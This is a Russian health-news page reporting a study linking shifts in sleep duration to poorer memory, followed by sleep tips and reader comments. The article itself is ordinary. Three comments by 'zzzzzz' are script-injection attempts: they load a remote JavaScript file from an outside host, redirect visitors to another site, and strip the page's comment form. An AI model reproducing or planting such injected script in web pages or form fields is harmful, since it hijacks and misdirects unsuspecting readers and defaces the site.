Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Сколько нужно спать, чтоб...  >>  Сколько нужно спать, чтобы помнить все
 
Обратная связь
 

Сколько нужно спать, чтобы помнить все

Размер шрифта
16 июля 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Пусть я не высыпаюсь по будням, зато на выходных буду спать, как убитый. Знакомо? Многие из нас живут по такому принципу. Последнее американское исследование показало, что и то, и другое вредно для здоровья.

Давно известно, что продолжительность сна, отличная от рекомендованных семи часов, ассоциирована с повышенным риском ишемической болезни сердца и сахарного диабета 2 типа.

«Поскольку оба этих заболевания косвенно связаны с потерей памяти, мы предположили, что продолжительность сна также влияет на этот процесс», – рассказывает Элизабет Девор, глава исследования (Бостонский университет).

Ученые решили проверить эту гипотезу. Они собрали группу испытуемых в количестве 15 000 человек. Ученые опрашивали женщин на предмет продолжительности их сна в 1986 году (возраст участниц в это время находился в промежутке 40-65 лет) и в 2000 году (возраст – 54-79 лет).

Периодически в течение нескольких лет (с 1995 по 2000) испытуемым ежегодно предлагалось решить серию стандартных тестов на память.

«Выяснился следующий факт относительно тех женщин, средняя продолжительность сна которых изменилась на два или более часов с момента первого наблюдения: результаты их мнестических тестов были достоверно хуже», – говорит Девор.

Дин Хартли, доктор философии, директор научного подразделения Ассоциации болезни Альцгеймера утверждает следующее: «Данное исследование лишь констатирует факт наличия взаимосвязи между сном и памятью, но ничего не говорит о причинно-следственных отношениях».

Тем не менее, связь эта подтверждается и в других научных работах. Например, ученые из бостонской клиники Beth Israel Deaconess Medical Center в ходе крупного исследования обнаружили, что здоровый сон запускает некие биохимические механизмы, которые способствуют улучшению памяти.

Элизабет Девор смотрит в будущее с заразительным оптимизмом и надеется, что ее работа в будущем позволит разработать новые концепции борьбы с ухудшением памяти: как изолированным, так и в рамках болезни Альцгеймера.

Как правильно спать

Мы, со своей стороны, советуем вам придерживаться следующих простых правил:

  • Поддерживайте постоянную продолжительность сна, как в рабочие дни, так и во время выходных.
  • Откажитесь от употребления кофеина, шоколада и алкоголя перед сном.
  • Избегайте источников яркого света перед тем, как лечь спать.

Узнайте все о том, как сохранить память в нашем специальном проекте!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

23 июля 2013 в 07:50

Цитировать   |   Пожаловаться

Конечно, значение сна трудно переоценить. По себе знаю что когда не выспишься то чувствуешь себя довольно таки некомфортно, не в своей тарелке, и к концу дня вся накопившаяся усталость наваливается тяжким грузом.

2 - zzzzzz

30 июня 2015 в 19:11

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 19:31

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 23:11

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Во сколько ложиться спать, чтобы не попасть в аварию? Вы удивитесь!   Как прикорнуть и зарядиться энергией на день   Как правильно спать   Как выспаться  
15 июля 2013Сколько нужно спать, чтобы помнить все 03 июня 2013Недосып лечит депрессию. Сколько спать, чтобы не сойти с ума?
 
11 июля 2013Ворочаетесь по ночам? У вас в два раза больше шансов умереть раньше! 01 ноября 2013ИНВИТРО – «Марка №1» в России
 

Слайдшоу

1
Как спать с бронхитом
Как провести день, чтобы выспаться
Как студенческая жизнь влияет на здоровье

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.